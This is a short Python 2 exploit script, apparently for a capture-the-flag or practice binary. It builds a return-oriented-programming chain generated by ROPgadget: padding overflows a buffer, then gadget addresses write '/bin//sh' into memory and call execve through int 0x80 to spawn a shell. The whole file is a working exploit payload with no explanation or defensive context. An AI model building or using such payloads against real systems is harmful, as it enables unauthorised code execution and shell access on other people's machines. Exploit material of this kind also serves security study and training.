#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''
p = 'a' * 37

p += pack('<I', 0x0806ef2b)  # pop edx ; ret
p += pack('<I', 0x080ea060)  # @ .data
p += pack('<I', 0x080b8836)  # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805492b)  # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b)  # pop edx ; ret
p += pack('<I', 0x080ea064)  # @ .data + 4
p += pack('<I', 0x080b8836)  # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805492b)  # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b)  # pop edx ; ret
p += pack('<I', 0x080ea068)  # @ .data + 8
p += pack('<I', 0x08049333)  # xor eax, eax ; ret
p += pack('<I', 0x0805492b)  # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9)  # pop ebx ; ret
p += pack('<I', 0x080ea060)  # @ .data
p += pack('<I', 0x080defc9)  # pop ecx ; ret
p += pack('<I', 0x080ea068)  # @ .data + 8
p += pack('<I', 0x0806ef2b)  # pop edx ; ret
p += pack('<I', 0x080ea068)  # @ .data + 8
p += pack('<I', 0x08049333)  # xor eax, eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0804f0b3)  # inc eax ; ret
p += pack('<I', 0x0806cb25)  # int 0x80

print p
